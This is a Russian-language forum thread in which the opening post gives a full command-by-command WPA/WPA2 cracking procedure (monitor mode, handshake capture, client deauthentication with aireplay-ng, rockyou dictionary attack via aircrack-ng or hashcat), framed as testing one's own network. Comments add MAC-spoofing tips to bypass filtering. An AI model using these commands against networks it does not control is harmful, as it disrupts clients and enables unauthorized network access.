URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 111811
[ Назад ]

Исходное сообщение
"Раздел полезных советов: Проверка безопасности беспроводной ..."

Отправлено auto_tips , 25-Июл-17 15:23 
Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но злоумышленник может получить доступ к системам, на которых установлен недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить свои системы на предмет стойкости к атаке по типовому словарю паролей. Предлагается два метода восстановления пароля по перехваченному в трафике хэшу - при помощи  [[http://aircrack-ng.org/ Aircrack-ng]] и  [[http://hashcat.net/ Hashcat]].

Устанавливаем Aircrack-ng:

   sudo apt-get install aircrack-ng

Определяем, поддерживает ли беспроводная карта режим мониторинга (http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:

   airmon-ng

Переводим беспроводную плату в режим мониторинга:

   airmon-ng start wlan0

Отслеживаем все проходящие в эфире кадры на предмет идентификаторов беспроводной сети (BSSID)  и используемых номеров каналов.

   airodump-ng mon0

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   9C:5E:8A:C9:AB:C0  -81       19        0    0   6  54e  WPA2 CCMP   PSK  mywifi
   ...

Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием нового соединения (ждём пока появится надпись "WPA handshake" и прерываем перехват по ctrl-c):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0

Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0

   BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                
   9C:5E:8A:C9:AB:C0  64:BC:0C:49:87:F7  -37    1e- 1e     4     6479  ASUS

   aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0


Загружаем  словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):

   curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/down...

Запускаем  aircrack-ng в режиме подбора хэша пароля по словарю (подбор выполняется только на CPU, без привлечения GPU):

   aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap

Или используем для этого [[https://github.com/brannondorsey/naive-hashcat naive-hashcat]] (более эффективен при наличии доступа к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты  [[https://github.com/hashcat/hashcat-utils cap2hccapx]]:

   cap2hccapx.bin capture/-01.cap capture/-01.hccapx
   HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

URL: https://github.com/brannondorsey/wifi-cracking
Обсуждается: http://www.opennet.me/tips/info/3025.shtml


Содержание

Сообщения в этом обсуждении
"Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat"
Отправлено Аноним , 27-Июл-17 02:44 
Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил пароль.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено cmp , 27-Июл-17 06:28 
Хе, а у меня 32 - мд5 какой-то лабуды, ноут проще проводом воткнуть и скопировать, а на телефон смс отправить

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено PuskatelSheptunov , 28-Июл-17 00:03 
я параноик? у меня 63, или вы из соседних палат?

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено sabakka , 01-Сен-17 23:44 
у меня 20см.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 21-Сен-17 13:18 
Мы с вами из одной палаты, коллега.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 15-Окт-17 13:30 
А у меня 64 символа...

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено AdVv , 28-Июл-17 10:21 
> Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не
> подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил
> пароль.

Главное WPS не выключайте !


"Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat"
Отправлено 123 , 31-Июл-17 04:11 
Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в словаре, но отсеим 95% хакеров-любителей.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 02-Авг-17 09:25 
ты идиот? там видно при скане маки подключеных устройств, я могу твой мак вписать себе, вот ты лох.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 04-Авг-17 08:35 
> Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в
> словаре, но отсеим 95% хакеров-любителей.

Если бы ты хоть что-то понимал в безопасности то догадался бы что сменить мак значительно проще чем сломать пароль, даже такой. И требования к оборудованию/ос намного меньше. Поэтому фильтр по маку - вообще не защита. Ну разве что если ты сам точкой пользоваться не будешь совсем, предоставив атакующему подбирать весь диапазон маков. Но если ты такой стебщик, проще поставить открытую точку доступа которая никуда не подключена. Или подключена через какой-нибудь очень хитро настроенный файрфол, чтобы пролезал только какой-нибудь днс туннель и более нифига.


"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 04-Авг-17 21:55 
Речь о хакерах любителях же. ну улыбнитесь хоть.
Вот ты будешь подменять маки устройств в сети во время перебора паролей? Сеть будет лагать, люди будут дергать шнур роутера и т д.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 21-Авг-17 22:03 
Ты не поверишь - сканить будут днём, а подменять мак ночью.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 28-Авг-17 04:42 
> Вот ты будешь подменять маки устройств в сети во время перебора паролей?

Если сеть по другому не пускает - без вариантов.

> Сеть будет лагать, люди будут дергать шнур роутера и т д.

Зависит требуется ли скрытность. Если да - подождать пока какой-нибудь клиент угомонится, и тогда.


"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено Аноним , 04-Авг-17 21:57 
Огласите время перебора среднего пароля из 10 символов на квантовом компьютере, а то не усну.
Как заставить точку допускать одну аунтификацию в секунду, например? Микротик может?

"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено Anonimous , 07-Авг-17 22:58 
Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.

"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено MatrixHasYou , 10-Ноя-17 07:17 
> Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.

Ага, а можно в вашей Виндовс поставить виртуалбокс и поднять там хакинтош чтобы ткнуть на красивую иконочку.

ps вы все равно не поймете, но как раз над кнопочкой metarouter есть кнопочка radius коли он вам так нужен


"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено Аноним , 17-Авг-17 03:27 
Ну что, все еще не уснул?

"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено Аноним , 21-Авг-17 22:04 
> Ну что, все еще не уснул?

Давайте не дадим спать болезному полгода? Пусть он примет книгу рекордов.


"Раздел полезных советов: Проверка безопасности беспроводной ..."
Отправлено ыпр , 14-Окт-17 18:21 
внутривенно? :)

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat"
Отправлено Kuromi , 19-Авг-17 01:20 
"Переводим беспроводную плату в режим мониторинга:

   airmon-ng start wlan0"

Ага, а что, любую карту так можно? раньше помнится были списки чипсетов которые такое позволяли...


"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 21-Авг-17 22:05 
> Ага, а что, любую карту так можно?

Любую из списка. Ты новость вообще читал?


"Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat"
Отправлено лютый жабист__ , 20-Авг-17 08:33 
Спасибо за статью! Не знал, что так всё просто.

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 23-Авг-17 22:51 
а слабо было "iwconfig wlan0 mode Monitor" попробовать ? Тут нелинуксоиды вопросы оставляют с хитрым словом "чипсет" ???

"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 10-Сен-17 18:35 
> Не знал, что так всё просто.

Знал, что так всё не просто.


"Проверка безопасности беспроводной сети WPA/WPA2 при помощи ..."
Отправлено Аноним , 12-Авг-18 13:42 
Знал, что не всё так просто.